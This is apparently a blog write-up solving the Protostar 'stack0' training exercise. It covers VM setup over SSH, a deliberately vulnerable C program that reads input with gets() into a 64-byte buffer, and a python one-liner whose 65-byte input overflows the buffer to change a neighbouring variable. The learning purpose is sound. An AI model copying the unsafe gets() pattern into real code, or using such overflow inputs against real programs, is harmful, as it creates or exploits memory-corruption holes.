Protostar vm, stack0

jekyll update

I decided it was time to upgrade my current knowledge on software security as I have a great interest in that domain.

To do so, I’ll try to solve the Protostar vm from exploit-exercices.com

In this series of articles I’ll explain my findings on each exercices.

First, let’s set-up our environment.

I’m using VirtualBox to run the vm. I activated port forwarding in the netwotk options in order to use ssh and not worrying about virtualbox.

So in network options, add a rule with :
tcp, name:ssh, host port: 2222, guest port:22

You can leave the rest blank.

Boot the vm, once you’ve done that, you’re all set.

You can now connect through ssh using user/user :

1
~ david$ ssh -p 2222 user@127.0.0.1

let’s switch to bash, and go to the right directory :

1
2
3
$ bash
user@protostar:~$ cd /opt/protostar/bin/
user@protostar:/opt/protostar/bin$

Here is the source of the vulnerable program :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}

It’s vulnerable to a simple bufferoverflow. If we write a value to big for the buffer, say 65 chars, the program will write the extra data in the next stack variable : ‘modified’ and thus, we’ll change it’s value.

Let’s test that :

1
2
user@protostar:/opt/protostar/bin$ python -c 'print 65*"A"' | ./stack0 
you have changed the 'modified' variable

Bingo !

See you at the next exercice.